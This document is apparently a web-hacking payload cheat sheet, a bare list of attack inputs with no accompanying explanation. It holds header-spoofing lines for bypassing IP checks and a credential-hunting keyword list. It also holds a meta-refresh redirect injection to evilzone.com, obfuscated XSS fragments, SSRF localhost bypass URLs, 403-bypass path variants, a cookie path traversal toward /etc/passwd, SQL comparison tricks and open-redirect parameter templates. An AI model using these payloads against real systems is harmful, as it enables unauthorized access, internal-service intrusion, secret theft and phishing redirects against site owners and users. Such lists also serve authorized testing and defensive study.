


X-Rewrite-Url:
X-Original-Url:
X-Forwarded-Host:
X-Forwarded-Port:
X-Forwarded-Scheme:
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorizition: 127.0.0.1
X-Forwarded-For: 127.0.0.2
X-Originting-IP: 127.0.0.1
X-Remote-IP: 127.0.0.3
X-Remote-Addr: 127.0.0.4
X-Client-IP: 127.0.0.5
X-Host: 127.0.0.6
X-Forwarded-Host: 127.0.0.1

{api_key, api-key, apikey , api , access , AccessToken , gmap , gmaps , algolia_api_key , credentials, etc..}

debug/pprof/FUZZ

0;url=http:&#x2F;&#x2F;www.evilzone.com"HTTP-EQUIV="refresh"any=".arexport

</CrIPT>
%3C%2F%53C%72I%50%54%2F%3E
alert
aler%26%23116;%3E

SSRF Bypass list for localhost (127.0.0.1):
http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01

If '/something' => 403
Try -
'/something/'
'/something/%20'
'/something.html'
'/something.json
'/something/?anything'
'/something#'

Cookie:usid=../../../../../../../../../../../../../etc/pasdwd

1. select '\f\l\a\g'='flag';  // This is true
2.  All are same
   *  select 'abcd'; 
   *  select 0x61626364; 
   *  select 0b01100001011000100110001101100100;
3. select 'admin' = 'àdmin'; // is true if utf8 is allowed






.*\.google\.com 
.*\.googleapis\.com
.*\.gstatic\.com
.*\.mozilla\.com
.*\.pki\.goog


/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_url={payload}
?redirect={payload}
/cgi-bin/redirect.cgi?{payload}
?out={payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

